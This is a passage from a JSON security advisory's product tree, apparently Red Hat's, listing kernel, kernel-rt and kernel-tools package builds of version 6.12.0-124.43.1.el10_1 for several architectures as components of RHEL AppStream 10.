"product_id": "AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
